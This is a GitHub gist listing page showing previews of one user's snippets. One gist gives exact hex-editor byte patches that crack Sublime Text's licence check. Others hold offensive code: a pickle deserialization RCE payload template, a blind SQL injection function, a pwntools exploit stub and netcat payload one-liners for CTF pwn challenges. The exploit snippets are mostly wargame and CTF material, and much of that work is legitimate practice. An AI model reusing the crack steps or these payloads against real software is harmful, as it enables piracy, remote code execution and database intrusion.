Skip to content

Instantly share code, notes, and snippets.

View spnow's full-sized avatar

spnow

45 followers · 93 following
View GitHub Profile
@JerryLokjianming
JerryLokjianming / Crack Sublime Text Windows and Linux.md
Last active October 16, 2025 07:32
Crack Sublime Text 3.2.2 Build 3211 and Sublime Text 4 Alpha 4098 with Hex

How to Crack Sublime Text 3.2.2 Build 3211 with Hex Editor (Windows | Without License) ↓

  1. Download & Install Sublime Text 3.2.2 Build 3211
  2. Visit https://hexed.it/
  3. Open file select sublime_text.exe
  4. Offset 0x8545: Original 84 -> 85
  5. Offset 0x08FF19: Original 75 -> EB
  6. Offset 0x1932C7: Original 75 -> 74 (remove UNREGISTERED in title bar, so no need to use a license)
@spnow
spnow / pickle-payload.py
Created August 9, 2017 14:04 — forked from mgeeky/pickle-payload.py
Python's Pickle Remote Code Execution payload template.
#!/usr/bin/python
#
# Pickle deserialization RCE payload.
# To be invoked with command to execute at it's first parameter.
# Otherwise, the default one will be used.
#
import cPickle
import os
import sys
@spnow
spnow / awesome-pwnable.md
Created April 11, 2017 23:39 — forked from kcchu/awesome-pwnable.md

Awesome Pwnable

Meta

  • awesome-ctf - A curated list of CTF frameworks, libraries, resources and softwares

Heap Exploitation

  • malloc.c - malloc() implementation in glib-2.23 (as found in Ubuntu 16.04.1 LTS)
  • how2heap - Awesome collection of various heap exploitation techniques
@spnow
spnow / stdio_ctf_trick.md
Created March 16, 2017 21:03
ctf trick for persist stdio in pwn 
(python -c 'print "payload"'; cat -) | nc pwnable.url
(echo payload; cat) | ./pwnable

cat payload - | ./pwnable

@spnow
spnow / start.py
Created March 16, 2017 20:48
Pwnable.tw - Start
#!/usr/bin/python
#ABDELJALIL NOUIRI
#author : [email protected]
from pwn import *
HOST = 'chall.pwnable.tw'
PORT = 10000
@spnow
spnow / rubiya.js
Created March 4, 2017 18:08 — forked from anonymous/rubiya.js
function pwn(params){
var http = new XMLHttpRequest();
var url = "/game/stats.php?action=psolve";
http.open("POST", url, false);
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.send("action=showpsolve&problem_no="+params+"-- -");
if(http.response.indexOf("you wanna be first") == -1){ return true; }
else return false;
}
@spnow
spnow / Challenges.md
Created January 9, 2017 14:03 — forked from yunga/Challenges.md
Puzzles, Riddles, Crackme, Programming Challenges...
@spnow
spnow / find.c
Created January 9, 2017 13:57 — forked from cvonkleist/find.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <openssl/evp.h>
// compile with: gcc -lssl find.c
@spnow
spnow / iptables_mysql.py
Created January 5, 2017 01:11 — forked from songmw90/iptables_mysql.py
Monitor mysql-error.log / added iptables to block ip
#!/usr/bin/env python
# -*- coding: utf8 -*-
import re
from subprocess import call
path = "/var/log/mysql/"
log = "error.log"
logContents = ""
@spnow
spnow / rev150.gdb
Created January 3, 2017 14:14 — forked from toufik-airane/rev150.gdb
Breizh CTF 2015
# BreizhCTF2015 Reverse me ! (150pts) Solution
shell python -c "print'a'*42" > /tmp/in
# cmp dl, al
b*0x080485c7
command
set $eax=$edx
append value /tmp/flag.log $eax
c
end
r < /tmp/in